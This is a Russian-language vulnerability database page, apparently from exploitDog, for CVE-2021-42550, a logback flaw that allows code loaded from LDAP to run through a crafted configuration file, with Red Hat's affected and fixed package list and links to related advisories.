Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2021-42550

Опубликовано: 16 дек. 2021
Источник: redhat
CVSS3: 6.6
EPSS Низкий

Описание

In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.

A flaw was found in the logback package. When using a specially-crafted configuration, this issue could allow a remote authenticated attacker to execute arbitrary code loaded from LDAP servers.

Отчет

Red Hat Satellite shipped affected versions, however, it is not vulnerable because the product doesn't meet the conditions needed to perform the attack.

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat BPM Suite 6logback-classicOut of support scope
Red Hat Integration Camel K 1logback-classicAffected
Red Hat Integration Camel Quarkus 1logback-classicNot affected
Red Hat JBoss BRMS 6logback-classicOut of support scope
Red Hat JBoss Fuse 6logback-classicOut of support scope
Red Hat Fuse 7.11logback-classicFixedRHSA-2022:553207.07.2022
Red Hat Satellite 6.11 for RHEL 7candlepinFixedRHSA-2022:549805.07.2022
Red Hat Satellite 6.11 for RHEL 8candlepinFixedRHSA-2022:549805.07.2022
RHDM 7.12.1logback-classicFixedRHSA-2022:111029.03.2022
RHPAM 7.12.1logback-classicFixedRHSA-2022:110829.03.2022

Показывать по

Ссылки на источники

Дополнительная информация

Статус:

Moderate
Дефект:
CWE-502
https://bugzilla.redhat.com/show_bug.cgi?id=2033560logback: remote code execution through JNDI call from within its configuration file

EPSS

Процентиль: 85%
0.02604
Низкий

6.6 Medium

CVSS3

Связанные уязвимости

ubuntu логотип

CVE-2021-42550

CVSS3: 6.6
ubuntu
около 4 лет назад

In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.

nvd логотип

CVE-2021-42550

CVSS3: 6.6
nvd
около 4 лет назад

In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.

debian логотип

CVE-2021-42550

CVSS3: 6.6
debian
около 4 лет назад

In logback version 1.2.7 and prior versions, an attacker with the requ ...

suse-cvrf логотип

SUSE-SU-2023:2097-1

suse-cvrf
почти 3 года назад

Security update for maven and recommended update for antlr3, minlog, sbt, xmvn

github логотип

GHSA-668q-qrv7-99fm

CVSS3: 6.6
github
около 4 лет назад

Deserialization of Untrusted Data in logback

EPSS

Процентиль: 85%
0.02604
Низкий

6.6 Medium

CVSS3